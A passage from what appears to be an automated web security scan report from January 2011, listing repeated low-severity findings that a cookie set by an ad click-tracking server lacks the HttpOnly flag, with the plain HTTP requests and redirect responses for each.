<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2101192040/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2101192040/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:30:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102258488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102258488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2105583430/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2105583430/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2110013632/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2110013632/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/222638617/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/222638617/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/230260175/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/230260175/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/249777070/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/249777070/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281847158/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281847158/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/285317148/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/285317148/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/287333455/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/287333455/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.flashedition.com/publication?i=59172
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.flashedition.com/publication?i=59172
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/301024327/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/301024327/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

14.489. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312414512/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312414512/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312414512/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:25:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312913212/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312913212/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:10:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/338106476/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/338106476/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:36:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

14.492. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/37601243/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/37601243/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/37601243/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396828855/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396828855/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

